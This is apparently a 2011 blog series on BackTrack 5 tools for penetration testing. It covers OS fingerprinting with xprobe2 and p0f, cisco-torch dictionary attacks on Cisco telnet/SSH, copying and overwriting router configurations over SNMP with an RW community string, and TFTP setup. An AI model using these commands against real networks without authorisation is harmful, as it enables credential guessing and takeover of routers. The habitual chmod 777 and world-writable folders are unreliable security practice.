Tuesday, December 6, 2011

xprobe2

Information Gathering -> Network Analysis -> OS fingerprinting -> xprobe2

While p0f does passive OS fingerprinting, xprobe2 does active. It tries to find the OS type with multiple approaches, like fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. These mainly focus on network protocols like ICMP, TCP and UDP. Beside that it's capable to do port scanning as well.

It has quite a few options, but it's quite easy to run with the default settings:

root@bt:~# xprobe2 192.168.1.11


It's not really accurate, but probably because its database is not up-to-date.

p0f

Information Gathering -> Network Analysis -> OS fingerprinting -> p0f

p0f = Passive OS Fingerprinting

p0f is capable to identify OS fingerprints in passive mode. It does it by sniffing and analyzing TCP packets, so in case we connect somewhere, or someone else connects to us, it can listen to the traffic passively, and doesn't generate any traffic. It can detect OSes in the following ways:
- SYN mode (who connects to us) - this is the default
- SYN + ACK mode - where we connect to
- RST+ mode - where we can't connect
- those whose traffic we see

The default fingerprint database can be found in the /etc/p0f/ folder.

Examples:

root@bt:~# p0f -h <- help
root@bt:~# p0f -i eth1 <- listen on eth1 interface
root@bt:~# p0f -i eth1 -A <- SYN ACK mode
root@bt:~# p0f -i eth1 -A -l -t <- one line output and timestamp

For me it didn't really worked out, no matter what I visited.


Official website: http://lcamtuf.coredump.cx/p0f.shtml

Sunday, December 4, 2011

cisco-torch

Vulnerability Assessment -> Network Assesstment -> Cisco Tools

This is an all-in-one tool for finding Cisco passwords, vulnerabilities, fingerprints and downloading configuration. It can scan the telnet, SSH, HTTP, NTP and SNMP services and make a dictionary attack against them. The app configuration file called torch.conf, where we need to set the parameters (password file, tftp server IP address, etc...) before running it.

Usage, examples:

./cisco-torch.pl <- help

./cisco-torch.pl -A 192.168.80.138 <- running all tests

./cisco-torch.pl -t -b 192.168.80.138 <- dictionary attacking against telnet


Official Website: http://www.hackingciscoexposed.com/?link=tools

Friday, December 2, 2011

copy-router-config / merge-router-config

Vulnerability Assessment -> Network Assesstment -> Cisco Tools

This tool is good for copying a Cisco router's running configuration with SNMP to a TFTP server, if we have the RW community string. This can be discovered for example with the Cisco Auditing Tool. My TFTP server is running on  the Backtrack machine.

Usage:

chmod 777 copy-router-config.pl <- By default we don't have permission to run it, so give ourselves permission.

root@bt:/pentest/cisco/copy-router-config# ./copy-router-config.pl 192.168.80.137 192.168.80.128 private

The first IP is the router, the second is the TFTP server. The configuration is saved to a file called "pwnd-router.config".

The pair of this tool is the merge-router-config.pl. This can copy a config file to the  router's running config. Its usage is similar:

chmod 777 merge-router-config.pl <- Again, by default we don't have permission to run it, so give ourselves permission.

root@bt:/pentest/cisco/copy-router-config# ./merge-router-config.pl 192.168.80.137 192.168.80.128 private

The first IP is the router, the second is the TFTP server. The configuration is copied from a file called "pwnd-router.config".

This can be good to change the passwords on a router, by overwriting its configuration.


The Cisco router configuration related to this, is:

snmp-server community private RW

Thursday, December 1, 2011

Backtrack basics 11. - TFTP service

Backtrack 5 doesn't have TFTP by default as it was in BT4, we need to install it:

root@bt# apt-get install tftpd

Starting the service:

root@bt:~# in.tftpd /srv/tftp/

root@bt:~# netstat -a | grep tftp
udp 0 0 *:tftp *:*


After that we can start to use it.

#update

It's better if we install the "atftpd" package, this TFTP server has more options, for example we can run it as a separate thread, and not as part of the "inetd" process. The TFTP folder should be readable / writable to everyone.

The tool's configuration file can be found in "/etc/inetd.conf".

root@bt# apt-get install atftpd

Starting the service:

root@bt:~# in.tftpd --daemon /tftpboot/

root@bt:~# netstat -a | grep tftp
udp 0 0 *:tftp *:*